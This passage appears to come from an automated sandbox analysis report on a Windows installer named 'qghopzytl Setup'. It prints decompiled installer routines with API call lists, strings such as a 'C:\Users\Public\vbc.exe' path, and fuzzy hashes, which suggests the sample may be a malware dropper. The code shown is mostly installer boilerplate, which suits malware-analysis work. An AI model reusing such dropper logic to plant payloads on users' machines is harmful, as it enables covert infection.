              						L58:
              						if( *0x42b0a0 == _t133) {
              							_t142 =  *0x42e3f8 - _t133; // 0x0
              							if(_t142 != 0) {
              								ShowWindow(_t125, 0xa);
              								 *0x42b0a0 = 1;
              							}
              						}
              						L61:
              						return 0;
              					}
              				}
              			}

































              APIs
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
              • ShowWindow.USER32(?), ref: 00403A09
              • DestroyWindow.USER32 ref: 00403A1D
              • SetWindowLongA.USER32 ref: 00403A39
              • GetDlgItem.USER32(?,?), ref: 00403A5A
              • SendMessageA.USER32 ref: 00403A6E
              • IsWindowEnabled.USER32(00000000), ref: 00403A75
              • GetDlgItem.USER32(?,00000001), ref: 00403B23
              • GetDlgItem.USER32(?,00000002), ref: 00403B2D
              • SetClassLongA.USER32(?,000000F2,?), ref: 00403B47
              • SendMessageA.USER32 ref: 00403B98
              • GetDlgItem.USER32(?,00000003), ref: 00403C3E
              • ShowWindow.USER32(00000000,?), ref: 00403C5F
              • EnableWindow.USER32(?,?), ref: 00403C71
              • EnableWindow.USER32(?,?), ref: 00403C8C
              • GetSystemMenu.USER32 ref: 00403CA2
              • EnableMenuItem.USER32 ref: 00403CA9
              • SendMessageA.USER32 ref: 00403CC1
              • SendMessageA.USER32 ref: 00403CD4
              • lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,qghopzytl Setup), ref: 00403CFD
              • SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
              • ShowWindow.USER32(?,0000000A), ref: 00403E40
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
              • String ID: qghopzytl Setup
              • API String ID: 184305955-2370166216
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E00403FCB(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
              				char* _v8;
              				signed int _v12;
              				void* _v16;
              				struct HWND__* _t52;
              				intOrPtr _t71;
              				intOrPtr _t85;
              				long _t86;
              				int _t98;
              				struct HWND__* _t99;
              				signed int _t100;
              				intOrPtr _t107;
              				intOrPtr _t109;
              				int _t110;
              				signed int* _t112;
              				signed int _t113;
              				char* _t114;
              				CHAR* _t115;
              
              				if(_a8 != 0x110) {
              					if(_a8 != 0x111) {
              						L11:
              						if(_a8 != 0x4e) {
              							if(_a8 == 0x40b) {
              								 *0x42a080 =  *0x42a080 + 1;
              							}
              							L25:
              							_t110 = _a16;
              							L26:
              							return E00403EEA(_a8, _a12, _t110);
              						}
              						_t52 = GetDlgItem(_a4, 0x3e8);
              						_t110 = _a16;
              						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
              							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
              							_t109 =  *((intOrPtr*)(_t110 + 0x18));
              							_v12 = _t100;
              							_v16 = _t109;
              							_v8 = 0x42dbc0;
              							if(_t100 - _t109 < 0x800) {
              								SendMessageA(_t52, 0x44b, 0,  &_v16);
              								SetCursor(LoadCursorA(0, 0x7f02));
              								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
              								SetCursor(LoadCursorA(0, 0x7f00));
              								_t110 = _a16;
              							}
              						}
              						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
              							goto L26;
              						} else {
              							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
              								SendMessageA( *0x42ec28, 0x111, 1, 0);
              							}
              							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
              								SendMessageA( *0x42ec28, 0x10, 0, 0);
              							}
              							return 1;
              						}
              					}
              					if(_a12 >> 0x10 != 0 ||  *0x42a080 != 0) {
              						goto L25;
              					} else {
              						_t112 =  *0x429870 + 0x14;
              						if(( *_t112 & 0x00000020) == 0) {
              							goto L25;
              						}
              						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
              						E00403EA5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
              						E00404256();
              						goto L11;
              					}
              				}
              				_t98 = _a16;
              				_t113 =  *(_t98 + 0x30);
              				if(_t113 < 0) {
              					_t107 =  *0x42e3fc; // 0x50be62
              					_t113 =  *(_t107 - 4 + _t113 * 4);
              				}
              				_t71 =  *0x42ec58; // 0x50a4d4
              				_push( *((intOrPtr*)(_t98 + 0x34)));
              				_t114 = _t113 + _t71;
              				_push(0x22);
              				_a16 =  *_t114;
              				_v12 = _v12 & 0x00000000;
              				_t115 = _t114 + 1;
              				_v16 = _t115;
              				_v8 = E00403F97;
              				E00403E83(_a4);
              				_push( *((intOrPtr*)(_t98 + 0x38)));
              				_push(0x23);
              				E00403E83(_a4);
              				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
              				E00403EA5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
              				_t99 = GetDlgItem(_a4, 0x3e8);
              				E00403EB8(_t99);
              				SendMessageA(_t99, 0x45b, 1, 0);
              				_t85 =  *0x42ec30; // 0x504d60
              				_t86 =  *(_t85 + 0x68);
              				if(_t86 < 0) {
              					_t86 = GetSysColor( ~_t86);
              				}
              				SendMessageA(_t99, 0x443, 0, _t86);
              				SendMessageA(_t99, 0x445, 0, 0x4010000);
              				 *0x429064 =  *0x429064 & 0x00000000;
              				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
              				SendMessageA(_t99, 0x449, _a16,  &_v16);
              				 *0x42a080 =  *0x42a080 & 0x00000000;
              				return 0;
              			}

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
              • String ID: N$TclpOwkq$`MP$open
              • API String ID: 3615053054-2787215503
              • Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
              • Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
              • Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
              • Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 90%
              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
              				struct tagLOGBRUSH _v16;
              				struct tagRECT _v32;
              				struct tagPAINTSTRUCT _v96;
              				struct HDC__* _t70;
              				struct HBRUSH__* _t87;
              				struct HFONT__* _t94;
              				long _t102;
              				intOrPtr _t115;
              				signed int _t126;
              				struct HDC__* _t128;
              				intOrPtr _t130;
              
              				if(_a8 == 0xf) {
              					_t130 =  *0x42ec30; // 0x504d60
              					_t70 = BeginPaint(_a4,  &_v96);
              					_v16.lbStyle = _v16.lbStyle & 0x00000000;
              					_a8 = _t70;
              					GetClientRect(_a4,  &_v32);
              					_t126 = _v32.bottom;
              					_v32.bottom = _v32.bottom & 0x00000000;
              					while(_v32.top < _t126) {
              						_a12 = _t126 - _v32.top;
              						asm("cdq");
              						asm("cdq");
              						asm("cdq");
              						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
              						_t87 = CreateBrushIndirect( &_v16);
              						_v32.bottom = _v32.bottom + 4;
              						_a16 = _t87;
              						FillRect(_a8,  &_v32, _t87);
              						DeleteObject(_a16);
              						_v32.top = _v32.top + 4;
              					}
              					if( *(_t130 + 0x58) != 0xffffffff) {
              						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
              						_a16 = _t94;
              						if(_t94 != 0) {
              							_t128 = _a8;
              							_v32.left = 0x10;
              							_v32.top = 8;
              							SetBkMode(_t128, 1);
              							SetTextColor(_t128,  *(_t130 + 0x58));
              							_a8 = SelectObject(_t128, _a16);
              							DrawTextA(_t128, "qghopzytl Setup", 0xffffffff,  &_v32, 0x820);
              							SelectObject(_t128, _a8);
              							DeleteObject(_a16);
              						}
              					}
              					EndPaint(_a4,  &_v96);
              					return 0;
              				}
              				_t102 = _a16;
              				if(_a8 == 0x46) {
              					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
              					_t115 =  *0x42ec28; // 0x50370
              					 *((intOrPtr*)(_t102 + 4)) = _t115;
              				}
              				return DefWindowProcA(_a4, _a8, _a12, _t102);
              			}

              APIs
              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
              • BeginPaint.USER32(?,?), ref: 00401047
              • GetClientRect.USER32 ref: 0040105B
              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
              • DeleteObject.GDI32(?), ref: 004010ED
              • CreateFontIndirectA.GDI32(?), ref: 00401105
              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
              • SetTextColor.GDI32(00000000,?), ref: 00401130
              • SelectObject.GDI32(00000000,?), ref: 00401140
              • DrawTextA.USER32(00000000,qghopzytl Setup,000000FF,00000010,00000820), ref: 00401156
              • SelectObject.GDI32(00000000,00000000), ref: 00401160
              • DeleteObject.GDI32(?), ref: 00401165
              • EndPaint.USER32(?,?), ref: 0040116E
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
              • String ID: F$`MP$qghopzytl Setup
              • API String ID: 941294808-3874227717
              • Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
              • Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
              • Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
              • Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E00405915(void* __eflags) {
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr* _t15;
              				long _t16;
              				intOrPtr _t18;
              				int _t20;
              				void* _t28;
              				long _t29;
              				intOrPtr* _t37;
              				int _t43;
              				void* _t44;
              				long _t47;
              				CHAR* _t49;
              				void* _t51;
              				void* _t53;
              				intOrPtr* _t54;
              				void* _t55;
              				void* _t56;
              
              				_t15 = E00405F57(2);
              				_t49 =  *(_t55 + 0x18);
              				if(_t15 != 0) {
              					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
              					if(_t20 != 0) {
              						L16:
              						 *0x42ecb0 =  *0x42ecb0 + 1;
              						return _t20;
              					}
              				}
              				 *0x42c230 = 0x4c554e;
              				if(_t49 == 0) {
              					L5:
              					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bca8, 0x400);
              					if(_t16 != 0 && _t16 <= 0x400) {
              						_t43 = wsprintfA(0x42b8a8, "%s=%s\r\n", 0x42c230, 0x42bca8);
              						_t18 =  *0x42ec30; // 0x504d60
              						_t56 = _t55 + 0x10;
              						E00405BE9(_t43, 0x400, 0x42bca8, 0x42bca8,  *((intOrPtr*)(_t18 + 0x128)));
              						_t20 = E0040589E(0x42bca8, 0xc0000000, 4);
              						_t53 = _t20;
              						 *(_t56 + 0x14) = _t53;
              						if(_t53 == 0xffffffff) {
              							goto L16;
              						}
              						_t47 = GetFileSize(_t53, 0);
              						_t7 = _t43 + 0xa; // 0xa
              						_t51 = GlobalAlloc(0x40, _t47 + _t7);
              						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
              							L15:
              							_t20 = CloseHandle(_t53);
              							goto L16;
              						} else {
              							if(E00405813(_t51, "[Rename]\r\n") != 0) {
              								_t28 = E00405813(_t26 + 0xa, 0x4093e4);
              								if(_t28 == 0) {
              									L13:
              									_t29 = _t47;
              									L14:
              									E0040585F(_t51 + _t29, 0x42b8a8, _t43);
              									SetFilePointer(_t53, 0, 0, 0);
              									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
              									GlobalFree(_t51);
              									goto L15;
              								}
              								_t37 = _t28 + 1;
              								_t44 = _t51 + _t47;
              								_t54 = _t37;
              								if(_t37 >= _t44) {
              									L21:
              									_t53 =  *(_t56 + 0x14);
              									_t29 = _t37 - _t51;
              									goto L14;
              								} else {
              									goto L20;
              								}
              								do {
              									L20:
              									 *((char*)(_t43 + _t54)) =  *_t54;
              									_t54 = _t54 + 1;
              								} while (_t54 < _t44);
              								goto L21;
              							}
              							E00405BC7(_t51 + _t47, "[Rename]\r\n");
              							_t47 = _t47 + 0xa;
              							goto L13;
              						}
              					}
              				} else {
              					CloseHandle(E0040589E(_t49, 0, 1));
              					_t16 = GetShortPathNameA(_t49, 0x42c230, 0x400);
              					if(_t16 != 0 && _t16 <= 0x400) {
              						goto L5;
              					}
              				}
              				return _t16;
              			}

              APIs
                • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?,?,?,00403194,0000000D), ref: 00405F84
              • CloseHandle.KERNEL32(00000000), ref: 00405962
              • GetShortPathNameA.KERNEL32 ref: 0040596B
              • GetShortPathNameA.KERNEL32 ref: 00405988
              • wsprintfA.USER32 ref: 004059A6
              • GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405A06
              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405A5E
              • GlobalFree.KERNEL32(00000000), ref: 00405A65
              • CloseHandle.KERNEL32(00000000), ref: 00405A6C
                • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
              • String ID: %s=%s$[Rename]$`MP
              • API String ID: 3445103937-4000334578
              • Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
              • Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
              • Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
              • Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 74%
              			E00405BE9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
              				signed int _v8;
              				struct _ITEMIDLIST* _v12;
              				signed int _v16;
              				signed char _v20;
              				signed int _v24;
              				signed char _v28;
              				signed int _t36;
              				CHAR* _t37;
              				signed int _t39;
              				int _t40;
              				char _t50;
              				char _t51;
              				char _t53;
              				char _t55;
              				void* _t63;
              				signed int _t69;
              				intOrPtr _t73;
              				signed int _t74;
              				signed int _t75;
              				intOrPtr _t79;
              				char _t83;
              				void* _t85;
              				CHAR* _t86;
              				void* _t88;
              				signed int _t95;
              				signed int _t97;
              				void* _t98;
              
              				_t88 = __esi;
              				_t85 = __edi;
              				_t63 = __ebx;
              				_t36 = _a8;
              				if(_t36 < 0) {
              					_t79 =  *0x42e3fc; // 0x50be62
              					_t36 =  *(_t79 - 4 + _t36 * 4);
              				}
              				_t73 =  *0x42ec58; // 0x50a4d4
              				_t74 = _t73 + _t36;
              				_t37 = 0x42dbc0;
              				_push(_t63);
              				_push(_t88);
              				_push(_t85);
              				_t86 = 0x42dbc0;
              				if(_a4 - 0x42dbc0 < 0x800) {
              					_t86 = _a4;
              					_a4 = _a4 & 0x00000000;
              				}
              				while(1) {
              					_t83 =  *_t74;
              					if(_t83 == 0) {
              						break;
              					}
              					__eflags = _t86 - _t37 - 0x400;
              					if(_t86 - _t37 >= 0x400) {
              						break;
              					}
              					_t74 = _t74 + 1;
              					__eflags = _t83 - 0xfc;
              					_a8 = _t74;
              					if(__eflags <= 0) {
              						if(__eflags != 0) {
              							 *_t86 = _t83;
              							_t86 =  &(_t86[1]);
              							__eflags = _t86;
              						} else {
              							 *_t86 =  *_t74;
              							_t86 =  &(_t86[1]);
              							_t74 = _t74 + 1;
              						}
              						continue;
              					}
              					_t39 =  *(_t74 + 1);
              					_t75 =  *_t74;
              					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
              					_a8 = _a8 + 2;
              					_v28 = _t75 | 0x00000080;
              					_t69 = _t75;
              					_v24 = _t69;
              					__eflags = _t83 - 0xfe;
              					_v20 = _t39 | 0x00000080;
              					_v16 = _t39;
              					if(_t83 != 0xfe) {
              						__eflags = _t83 - 0xfd;
              						if(_t83 != 0xfd) {
              							__eflags = _t83 - 0xff;
              							if(_t83 == 0xff) {
              								__eflags = (_t39 | 0xffffffff) - _t95;
              								E00405BE9(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
              							}
              							L41:
              							_t40 = lstrlenA(_t86);
              							_t74 = _a8;
              							_t86 =  &(_t86[_t40]);
              							_t37 = 0x42dbc0;
              							continue;
              						}
              						__eflags = _t95 - 0x1d;
              						if(_t95 != 0x1d) {
              							__eflags = (_t95 << 0xa) + 0x42f000;
              							E00405BC7(_t86, (_t95 << 0xa) + 0x42f000);
              						} else {
              							E00405B25(_t86,  *0x42ec28);
              						}
              						__eflags = _t95 + 0xffffffeb - 7;
              						if(_t95 + 0xffffffeb < 7) {
              							L32:
              							E00405E29(_t86);
              						}
              						goto L41;
              					}
              					_t97 = 2;
              					_t50 = GetVersion();
              					__eflags = _t50;
              					if(_t50 >= 0) {
              						L12:
              						_v8 = 1;
              						L13:
              						__eflags =  *0x42eca4;
              						if( *0x42eca4 != 0) {
              							_t97 = 4;
              						}
              						__eflags = _t69;
              						if(_t69 >= 0) {
              							__eflags = _t69 - 0x25;
              							if(_t69 != 0x25) {
              								__eflags = _t69 - 0x24;
              								if(_t69 == 0x24) {
              									GetWindowsDirectoryA(_t86, 0x400);
              									_t97 = 0;
              								}
              								while(1) {
              									__eflags = _t97;
              									if(_t97 == 0) {
              										goto L29;
              									}
              									_t51 =  *0x42ec24; // 0x74951528
              									_t97 = _t97 - 1;
              									__eflags = _t51;
              									if(_t51 == 0) {
              										L25:
              										_t53 = SHGetSpecialFolderLocation( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
              										__eflags = _t53;
              										if(_t53 != 0) {
              											L27:
              											 *_t86 =  *_t86 & 0x00000000;
              											__eflags =  *_t86;
              											continue;
              										}
              										__imp__SHGetPathFromIDListA(_v12, _t86);
              										__imp__CoTaskMemFree(_v12);
              										__eflags = _t53;
              										if(_t53 != 0) {
              											goto L29;
              										}
              										goto L27;
              									}
              									__eflags = _v8;
              									if(_v8 == 0) {
              										goto L25;
              									}
              									_t55 =  *_t51( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
              									__eflags = _t55;
              									if(_t55 == 0) {
              										goto L29;
              									}
              									goto L25;
              								}
              								goto L29;
              							}
              							GetSystemDirectoryA(_t86, 0x400);
              							goto L29;
              						} else {
              							_t72 = (_t69 & 0x0000003f) +  *0x42ec58;
              							E00405AAE(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x42ec58, _t86, _t69 & 0x00000040);
              							__eflags =  *_t86;
              							if( *_t86 != 0) {
              								L30:
              								__eflags = _v16 - 0x1a;
              								if(_v16 == 0x1a) {
              									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
              								}
              								goto L32;
              							}
              							E00405BE9(_t72, _t86, _t97, _t86, _v16);
              							L29:
              							__eflags =  *_t86;
              							if( *_t86 == 0) {
              								goto L32;
              							}
              							goto L30;
              						}
              					}
              					__eflags = _t50 - 0x5a04;
              					if(_t50 == 0x5a04) {
              						goto L12;
              					}
              					__eflags = _v16 - 0x23;
              					if(_v16 == 0x23) {
              						goto L12;
              					}
              					__eflags = _v16 - 0x2e;
              					if(_v16 == 0x2e) {
              						goto L12;
              					} else {
              						_v8 = _v8 & 0x00000000;
              						goto L13;
              					}
              				}
              				 *_t86 =  *_t86 & 0x00000000;
              				if(_a4 == 0) {
              					return _t37;
              				}
              				return E00405BC7(_a4, _t37);
              			}































              APIs
              • GetVersion.KERNEL32(00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
              • GetSystemDirectoryA.KERNEL32(TclpOwkq,00000400), ref: 00405D0C
              • GetWindowsDirectoryA.KERNEL32(TclpOwkq,00000400), ref: 00405D1F
              • SHGetSpecialFolderLocation.SHELL32(?,0041A276), ref: 00405D5B
              • SHGetPathFromIDListA.SHELL32(0041A276,TclpOwkq), ref: 00405D69
              • CoTaskMemFree.OLE32(0041A276), ref: 00405D74
              • lstrcatA.KERNEL32(TclpOwkq,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
              • lstrlenA.KERNEL32(TclpOwkq,00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
              • String ID: Software\Microsoft\Windows\CurrentVersion$TclpOwkq$\Microsoft\Internet Explorer\Quick Launch
              • API String ID: 900638850-487370903
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405E29(CHAR* _a4) {
              				char _t5;
              				char _t7;
              				char* _t15;
              				char* _t16;
              				CHAR* _t17;
              
              				_t17 = _a4;
              				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
              					_t17 =  &(_t17[4]);
              				}
              				if( *_t17 != 0 && E00405727(_t17) != 0) {
              					_t17 =  &(_t17[2]);
              				}
              				_t5 =  *_t17;
              				_t15 = _t17;
              				_t16 = _t17;
              				if(_t5 != 0) {
              					do {
              						if(_t5 > 0x1f &&  *((char*)(E004056E5("*?|<>/\":", _t5))) == 0) {
              							E0040585F(_t16, _t17, CharNextA(_t17) - _t17);
              							_t16 = CharNextA(_t16);
              						}
              						_t17 = CharNextA(_t17);
              						_t5 =  *_t17;
              					} while (_t5 != 0);
              				}
              				 *_t16 =  *_t16 & 0x00000000;
              				while(1) {
              					_t16 = CharPrevA(_t15, _t16);
              					_t7 =  *_t16;
              					if(_t7 != 0x20 && _t7 != 0x5c) {
              						break;
              					}
              					 *_t16 =  *_t16 & 0x00000000;
              					if(_t15 < _t16) {
              						continue;
              					}
              					break;
              				}
              				return _t7;
              			}









              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Char$Next$Prev
              • String ID: "C:\Users\Public\vbc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
              • API String ID: 589700163-1374994687
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00403EEA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
              				struct tagLOGBRUSH _v16;
              				long _t35;
              				long _t37;
              				void* _t40;
              				long* _t49;
              
              				if(_a4 + 0xfffffecd > 5) {
              					L15:
              					return 0;
              				}
              				_t49 = GetWindowLongA(_a12, 0xffffffeb);
              				if(_t49 == 0) {
              					goto L15;
              				}
              				_t35 =  *_t49;
              				if((_t49[5] & 0x00000002) != 0) {
              					_t35 = GetSysColor(_t35);
              				}
              				if((_t49[5] & 0x00000001) != 0) {
              					SetTextColor(_a8, _t35);
              				}
              				SetBkMode(_a8, _t49[4]);
              				_t37 = _t49[1];
              				_v16.lbColor = _t37;
              				if((_t49[5] & 0x00000008) != 0) {
              					_t37 = GetSysColor(_t37);
              					_v16.lbColor = _t37;
              				}
              				if((_t49[5] & 0x00000004) != 0) {
              					SetBkColor(_a8, _t37);
              				}
              				if((_t49[5] & 0x00000010) != 0) {
              					_v16.lbStyle = _t49[2];
              					_t40 = _t49[3];
              					if(_t40 != 0) {
              						DeleteObject(_t40);
              					}
              					_t49[3] = CreateBrushIndirect( &_v16);
              				}
              				return _t49[3];
              			}









              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
              • String ID:
              • API String ID: 2320649405-0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			E004026AF(struct _OVERLAPPED* __ebx) {
              				void* _t27;
              				long _t32;
              				struct _OVERLAPPED* _t47;
              				void* _t51;
              				void* _t53;
              				void* _t56;
              				void* _t57;
              				void* _t58;
              
              				_t47 = __ebx;
              				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
              				_t52 = E00402A29(0xfffffff0);
              				 *(_t58 - 0x38) = _t24;
              				if(E00405727(_t52) == 0) {
              					E00402A29(0xffffffed);
              				}
              				E0040587F(_t52);
              				_t27 = E0040589E(_t52, 0x40000000, 2);
              				 *(_t58 + 8) = _t27;
              				if(_t27 != 0xffffffff) {
              					_t32 =  *0x42ec34; // 0x8800
              					 *(_t58 - 0x30) = _t32;
              					_t51 = GlobalAlloc(0x40, _t32);
              					if(_t51 != _t47) {
              						E004030E2(_t47);
              						E004030B0(_t51,  *(_t58 - 0x30));
              						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
              						 *(_t58 - 0x34) = _t56;
              						if(_t56 != _t47) {
              							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
              							while( *_t56 != _t47) {
              								_t49 =  *_t56;
              								_t57 = _t56 + 8;
              								 *(_t58 - 0x48) =  *_t56;
              								E0040585F( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
              								_t56 = _t57 +  *(_t58 - 0x48);
              							}
              							GlobalFree( *(_t58 - 0x34));
              						}
              						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
              						GlobalFree(_t51);
